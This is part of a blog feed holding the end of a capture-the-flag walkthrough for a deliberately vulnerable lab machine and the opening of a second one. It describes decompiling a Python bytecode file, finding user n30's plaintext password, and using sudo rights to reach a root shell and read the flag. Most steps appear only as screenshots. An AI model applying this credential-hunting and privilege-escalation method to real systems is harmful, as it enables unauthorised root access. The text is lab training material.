src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhuGXUCGqNJ26uPr4C01NMOVb_yUB25mk8e0_T6DWpKIIEb_rocGxXWjJ8MFzOg2PodfPHqLkto7Pj9w2aT1P6X9i3poimY0kSy6J4tqGDkbbeZqLAlXemawSsvjDiYVROr-YJsZNwzpzKzEh1WwroCXh7H1j1uFMKmgKPf9PkL8qChoUMR069oDsrawg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj1jWZK2xV4gwb7hqZEsWrtB0LZ3S1BElQfpOodeV1dx_XXabrmP8V8GrD4hJWKWAzHdQlbS5MFNNQch0LbAThXl8po6mbmCVEAAXoi9tmcBcBfETh4oMToZCgwmtgoEAG9ihJBbP5nM_Rml66_ZY-Yjj5vL_cv51va3eqD6O_y3RPzvAaQ5X7tORUWVA&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;277&quot; data-original-width=&quot;658&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj1jWZK2xV4gwb7hqZEsWrtB0LZ3S1BElQfpOodeV1dx_XXabrmP8V8GrD4hJWKWAzHdQlbS5MFNNQch0LbAThXl8po6mbmCVEAAXoi9tmcBcBfETh4oMToZCgwmtgoEAG9ihJBbP5nM_Rml66_ZY-Yjj5vL_cv51va3eqD6O_y3RPzvAaQ5X7tORUWVA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhdrZCFI3hjsyAyh6K0C2HBuHhKLn8-aSz1-6q2_pcZK3WDNAxZ3IBuWQwGx6Cg7ibojvBA5ArYw4mpg7YkJqnCkgJj2i9lkLEgXOs62-H3g_psY-_5eKi13Cywya90bj_R85ulrNMTypHcxtNacpzxNXu8di8SFNP9ONEe7Nkp7wXDZZfXMqmwbxqauw&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;82&quot; data-original-width=&quot;359&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhdrZCFI3hjsyAyh6K0C2HBuHhKLn8-aSz1-6q2_pcZK3WDNAxZ3IBuWQwGx6Cg7ibojvBA5ArYw4mpg7YkJqnCkgJj2i9lkLEgXOs62-H3g_psY-_5eKi13Cywya90bj_R85ulrNMTypHcxtNacpzxNXu8di8SFNP9ONEe7Nkp7wXDZZfXMqmwbxqauw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Installing &lt;b&gt;uncompyle6&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg9qo-bXz41TAKJzETf2_FgH8CgIPqhmZg83q_TfhdmohJO2pS9L-sNaopWl1Sc_Y7HvlqciBHdG7PKSL2hPlofiabRSgJU8RZCtLZ1VP8KC6xqXAWSg6bS92CVQSJZrmVMYdtLef-DQRH0Wgd7HQuUnCCoa-Qua4MqY2UaFZtFIQTvOEQ2heI7BR1DWw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;51&quot; data-original-width=&quot;349&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg9qo-bXz41TAKJzETf2_FgH8CgIPqhmZg83q_TfhdmohJO2pS9L-sNaopWl1Sc_Y7HvlqciBHdG7PKSL2hPlofiabRSgJU8RZCtLZ1VP8KC6xqXAWSg6bS92CVQSJZrmVMYdtLef-DQRH0Wgd7HQuUnCCoa-Qua4MqY2UaFZtFIQTvOEQ2heI7BR1DWw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-Trying to uncompile &lt;b&gt;code&lt;/b&gt; if fails because there is no extension &lt;b&gt;.pyc&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi-4Hx3vNH9BqTHiI5kn90gdbjQgeWSyuBjFrROrzAJ1pxDC0UcmuM-L7kYf3KoFhXRrG52WxfIbdJWh8mcTMQvOXrMCkPSqUwWCaZtIPDm39SZD7Zbp2m7pc9NaniGWS1Jea9D5PQot9zPL8DULDUu6PSn1YUeD3eg-ds4ENFKQ3iEpQfkptMaECa90A&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;142&quot; data-original-width=&quot;453&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi-4Hx3vNH9BqTHiI5kn90gdbjQgeWSyuBjFrROrzAJ1pxDC0UcmuM-L7kYf3KoFhXRrG52WxfIbdJWh8mcTMQvOXrMCkPSqUwWCaZtIPDm39SZD7Zbp2m7pc9NaniGWS1Jea9D5PQot9zPL8DULDUu6PSn1YUeD3eg-ds4ENFKQ3iEpQfkptMaECa90A=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Adding extension &lt;b&gt;.pyc&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj6QimCNFpkIXjiK10b8FsQ2C5VXYzPLt267paim8-fYfvSTBpq8nEqS5hGwm7QNVu2eP8ymqppe2mmrSv6hhE0vZo8TSmJuFsJ7VbfVKcw8c7O0k3aOd0sWDIttFdMxBVTHMY8VPmWV-7AMteWKmBaF9K89drYGuHnuHSEk1J5LgIAiZuCAOnlSx1e7w&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;68&quot; data-original-width=&quot;321&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj6QimCNFpkIXjiK10b8FsQ2C5VXYzPLt267paim8-fYfvSTBpq8nEqS5hGwm7QNVu2eP8ymqppe2mmrSv6hhE0vZo8TSmJuFsJ7VbfVKcw8c7O0k3aOd0sWDIttFdMxBVTHMY8VPmWV-7AMteWKmBaF9K89drYGuHnuHSEk1J5LgIAiZuCAOnlSx1e7w=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Running &lt;b&gt;code.pyc&lt;/b&gt; there is nothing of interest:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjj8HKbGQLMTWfcGOi7PJOErxf6PrCMoo4B-veLMRu0Y6p_UI7H8B1i04ahOZzm-AAMcljNJUZ7QEVQmokFUgSEIO_MVpWBKCBD0QwAmt-c_IMGcsXgb9ZxgDJRVxiOnA0p17-GUsylLQTHDD9iIIXoo3TcMNfTpEZZLqp1iiEVlPscz9TNB92Aj6AjOQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;177&quot; data-original-width=&quot;965&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjj8HKbGQLMTWfcGOi7PJOErxf6PrCMoo4B-veLMRu0Y6p_UI7H8B1i04ahOZzm-AAMcljNJUZ7QEVQmokFUgSEIO_MVpWBKCBD0QwAmt-c_IMGcsXgb9ZxgDJRVxiOnA0p17-GUsylLQTHDD9iIIXoo3TcMNfTpEZZLqp1iiEVlPscz9TNB92Aj6AjOQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now &lt;b&gt;uncompyle6&lt;/b&gt; reverses &lt;b&gt;code.pyc&lt;/b&gt; into readable Python source code:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhbd2sVR718_TGxy-0O7iCyLmKUcnJxCotwgjo-q_qjfWTaDKvOWa-9nyEOFgrxiyEpB8bXcoLYDLSIccHO_TtGSjhsPqpW6MAPoLKMJRzahd4_1Ful-D9HBgIMzGSpa68jU4PqRjbMCFzWgLuJLWPTHJryuiXItxhcLtow39RWNwnJicYcAJc9BUdT3w&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;882&quot; data-original-width=&quot;893&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhbd2sVR718_TGxy-0O7iCyLmKUcnJxCotwgjo-q_qjfWTaDKvOWa-9nyEOFgrxiyEpB8bXcoLYDLSIccHO_TtGSjhsPqpW6MAPoLKMJRzahd4_1Ful-D9HBgIMzGSpa68jU4PqRjbMCFzWgLuJLWPTHJryuiXItxhcLtow39RWNwnJicYcAJc9BUdT3w=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-Focusing the attention on the column we have&amp;nbsp;&lt;b&gt;n30:dMASDNB!!#B!#!#33&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiq5x_JkBHvJcMr1cbbjiWWsNb8ulhywHhhwx8LyccD2Ofkv5mKiM0tKoqQBcuQAsvv0w_l3y0ukEuaK1mmakN6P-6NEwvdsbPUFCcH584-IgVNqZgw-nZD6P45TquLSghx2RT0-JVcI1D_27qlHWQRz7JG2eSaUxShFYoiS7BgdItlodVcHWROnbir7Q&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;485&quot; data-original-width=&quot;30&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiq5x_JkBHvJcMr1cbbjiWWsNb8ulhywHhhwx8LyccD2Ofkv5mKiM0tKoqQBcuQAsvv0w_l3y0ukEuaK1mmakN6P-6NEwvdsbPUFCcH584-IgVNqZgw-nZD6P45TquLSghx2RT0-JVcI1D_27qlHWQRz7JG2eSaUxShFYoiS7BgdItlodVcHWROnbir7Q=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Finally we can try&amp;nbsp;&lt;b&gt;n30&lt;/b&gt;&#39;s sudoer privileges:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhJ4ycM-alp7M1ii1setdJo2eif6r_pH2Su5AsCy4zriSPZMo2DqHAOFaHLbBr0RUBjwRlirq0bJ19Kzoc0EnWEqQTC7m2cwJWKT0A0rFQiRAKnpv0nXa6Q7J5bec0NAnouCz2U7rMvpXJR1YmKphsL7-7N6naDczbHaOlL3geijgDqw0OCyYFLsCGHQQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;161&quot; data-original-width=&quot;647&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhJ4ycM-alp7M1ii1setdJo2eif6r_pH2Su5AsCy4zriSPZMo2DqHAOFaHLbBr0RUBjwRlirq0bJ19Kzoc0EnWEqQTC7m2cwJWKT0A0rFQiRAKnpv0nXa6Q7J5bec0NAnouCz2U7rMvpXJR1YmKphsL7-7N6naDczbHaOlL3geijgDqw0OCyYFLsCGHQQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- We get a root shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgM3RlN8MhuGeo794hbKOXICCb1X3EtdjJ56AWEqcMw2z00wC9spUTSmI0DFEc7eZXSPWNvxXSCTpsRwjJJlTDvldKMB_w_yxdcIts950Xiw4wFCBIICwtwfNsk-uaiv5lgZOZunBkDOl-Hp1QSRIvRVB3KIBuOMbJThWfSdj0jp1Mv64LLyEDlKE3e2Q&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;70&quot; data-original-width=&quot;433&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgM3RlN8MhuGeo794hbKOXICCb1X3EtdjJ56AWEqcMw2z00wC9spUTSmI0DFEc7eZXSPWNvxXSCTpsRwjJJlTDvldKMB_w_yxdcIts950Xiw4wFCBIICwtwfNsk-uaiv5lgZOZunBkDOl-Hp1QSRIvRVB3KIBuOMbJThWfSdj0jp1Mv64LLyEDlKE3e2Q=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;6 - CAPTURING THE 2nd FLAG&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;root.txt&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhkWV-iSPjtMWIKrVn0s57sxbEJCURvGM8zDhZETVZXbeC2qHKdbh0Y7hKKYA9JS3PsCJOpMNNszUYfv2u0D9njbHVMk5sXygWMUjj22izviBQ2-lBT7G4rwqZhONKMdhX9lIQ4Hvc1LKZ7_bD4WI7Fa_MaGu-P0UtALUHm1jjiXqr5f84sTon6fGG8ww&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;46&quot; data-original-width=&quot;382&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhkWV-iSPjtMWIKrVn0s57sxbEJCURvGM8zDhZETVZXbeC2qHKdbh0Y7hKKYA9JS3PsCJOpMNNszUYfv2u0D9njbHVMk5sXygWMUjj22izviBQ2-lBT7G4rwqZhONKMdhX9lIQ4Hvc1LKZ7_bD4WI7Fa_MaGu-P0UtALUHm1jjiXqr5f84sTon6fGG8ww=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/3571066600460127598'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/3571066600460127598'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2022/02/w34kn3ss.html' title='w34kn3ss'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/a/AVvXsEj57VYDM-VgJKJSv9JcucnarQLKRh133R4g6sm_K9t1QYLn9psi-1S23L3BB3VibGf3CQTcnaTZPoPIcF4XMVYU0lm0RDEW5TzgiINlGwzmtV9KGziqqF5S4Y0eQkz1312NFf4Ie74w5NWusXK5j1J5ILYlxP-gNgnbAt-Hk13xIJjXNVG5997USMAYwQ=s72-c" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-5162906801237257630</id><published>2022-03-01T12:16:00.000-06:00</published><updated>2022-03-01T12:39:13.185-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>Healthcare</title><content type='html'>&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;HEALTHCARE&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhGAZ2uDjbCopVYBK7ERcxQNj25YJ6YPoH79eLLAP6TFqzSDZz5YFUuGrbegyXZ8o7B8A-UvoA81MSGyfMMDzHZsFd55EOS3MUW03djozGYgmjLLBTMpeqw_WGrklQkalPmz6K8SdTjbFo6WZjsMo6fh5eeAli2mxU-2zoUPoNVLeaLszgI0daUIZwk1g&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;269&quot; data-original-width=&quot;682&quot; 